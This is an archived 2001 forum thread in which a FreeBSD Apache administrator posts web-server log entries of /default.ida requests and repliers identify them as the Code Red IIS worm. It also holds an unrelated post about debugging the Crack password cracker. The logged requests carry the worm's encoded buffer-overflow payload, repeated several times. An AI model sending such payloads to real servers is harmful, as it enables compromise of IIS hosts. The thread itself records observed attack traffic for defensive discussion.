Another IIS Crack? (Take a Crack)

Another IIS Crack? (Take a Crack)

Post by Gary » Sat, 21 Jul 2001 11:21:19



Hello All!

I just received a green crack (never seen) today. Looks like another IIS
crack. Anyone know what default.ida is?
This crack has been hitting 4 of my sites all day.  No damage done here.
Running Apache on FreeBSD of course!  Any Ideas? Here is a snip:

195.68.89.10 - - [19/Jul/2001:10:13:27 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3

%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 40
4 282 "-" "-"
203.227.204.176 - - [19/Jul/2001:10:24:04 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%uc

bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0"
 404 282 "-" "-"
63.118.42.229 - - [19/Jul/2001:10:57:06 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd

3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 4
04 282 "-" "-"
194.216.8.230 - - [19/Jul/2001:11:56:04 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd

3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 4
04 282 "-" "-"
202.102.141.3 - - [19/Jul/2001:12:25:37 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd

3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 4
04 282 "-" "-"
65.105.253.40 - - [19/Jul/2001:12:51:49 -0700] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd

3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 4
04 282 "-" "-"

 
 
 

Another IIS Crack? (Take a Crack)

Post by Stephen Montgomery-Smit » Sat, 21 Jul 2001 12:15:23



> Hello All!

> I just received a green crack (never seen) today. Looks like another IIS
> crack. Anyone know what default.ida is?
> This crack has been hitting 4 of my sites all day.  No damage done here.

I had a few of those also.  Look at

http://slashdot.org/articles/01/07/19/2230246.shtml

--
Stephen Montgomery-Smith

http://www.math.missouri.edu/~stephen

 
 
 

Another IIS Crack? (Take a Crack)

Post by Acid » Mon, 23 Jul 2001 08:42:12


code red .ida worm.

go to www.eeye.com for more detailed info..


Quote:> Hello All!

> I just received a green crack (never seen) today. Looks like another IIS
> crack. Anyone know what default.ida is?
> This crack has been hitting 4 of my sites all day.  No damage done here.
> Running Apache on FreeBSD of course!  Any Ideas? Here is a snip:

> 195.68.89.10 - - [19/Jul/2001:10:13:27 -0700] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3
%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u
53ff%u0078%u0000%u00=a
Quote:> HTTP/1.0" 40
> 4 282 "-" "-"
> 203.227.204.176 - - [19/Jul/2001:10:24:04 -0700] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9
090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a
Quote:> HTTP/1.0"
>  404 282 "-" "-"
> 63.118.42.229 - - [19/Jul/2001:10:57:06 -0700] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u909
0%u6858%ucbd3%u7801%u9090%u6858%ucbd
3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a
Quote:> HTTP/1.0" 4
> 04 282 "-" "-"
> 194.216.8.230 - - [19/Jul/2001:11:56:04 -0700] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u909
0%u6858%ucbd3%u7801%u9090%u6858%ucbd
3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a
Quote:> HTTP/1.0" 4
> 04 282 "-" "-"
> 202.102.141.3 - - [19/Jul/2001:12:25:37 -0700] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u909
0%u6858%ucbd3%u7801%u9090%u6858%ucbd
3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a
Quote:> HTTP/1.0" 4
> 04 282 "-" "-"
> 65.105.253.40 - - [19/Jul/2001:12:51:49 -0700] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u909
0%u6858%ucbd3%u7801%u9090%u6858%ucbd
3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a
Quote:> HTTP/1.0" 4
> 04 282 "-" "-"

 
 
 

1. c50a stop cracking after few days: T:1001249644:Crack: Done.

Hi,

RE: Crackc c50a and error:  I:1001249644:OpenDictStream: status:
/error/

I run Crack of two machines (I ftp binaries from different sources and
compiled independently on each machine).

No matter which machine I run it on it always STOPS at the  point when
the file reaches  665792 in size!  It happens on both machines -
Solaris 2.6 and 2.7.
The file system is not full, and nobody kills the crack process.

files run/Dxxx.xxx on both machines look the same and always stop on:
I:1001249644:OpenDictStream: status: /error/

Any help?
Thanks,
Magda

-rw-------   1 root     other     665792 Sep 23 08:54 Dhost1.15637
-rw-------   1 root     other     665792 Sep 26 07:08 Dhost2.13892

I:1001249644:LoadDictionary: loaded 0 words into memory
I:1001249644:OpenDictStream: trying: kickdict 2312
I:1001249644:OpenDictStream: status: /ok/ stat=1 look=2312 find=2312
genset='conf/rules.perm7u' rule='/lsl1/oso0/isi1/ese3/sss$/asa4/hsh4u'
dgrp='gcperm' prog='smartcat run/dict/gcperm.*'
O:1001249644:2312
I:1001249644:LoadDictionary: loaded 0 words into memory
I:1001249644:OpenDictStream: trying: kickdict 2313
I:1001249644:OpenDictStream: status: /error/ stat=0 look=2313
find=2312 genset='l -e '$s="a"; print $s++,"\n" while (length($s) <
9);'' rule='/lsl1/oso0/isi1/ese3/sss$/asa4/hsh4u' dgrp='#:| perl -e
'$s="a"; print $s++,"\n" while (length($s) < 9);'' prog=''
O:1001249644:2313
I:1001249644:OpenDictStream: end of dictionaries: /error/ stat=0
look=2313 find=2312 genset='l -e '$s="a"; print $s++,"\n" while
(length($s) < 9);'' rule='/lsl1/oso0/isi1/ese3/sss$/asa4/hsh4u'
dgrp='#:| perl -e '$s="a"; print $s++,"\n" while (length($s) < 9);''
prog=''
T:1001249644:Crack: Done.

2. curses rewrites terminfo escape sequences????

3. Netbios crack from cracked firewall?

4. Will Linux replace all proprietary Unix variants?

5. Egghead cracked, MS IIS again

6. Dual cpu motherboard

7. Backward compatibility of linux libraries?

8. taking another crack at yaboot on a Pismo

9. Audio players... Anyone taken a crack at AF?

10. "Nvidia takes a crack at PCs" -- Interesting article from ZDNet

11. Error on Crack 4.1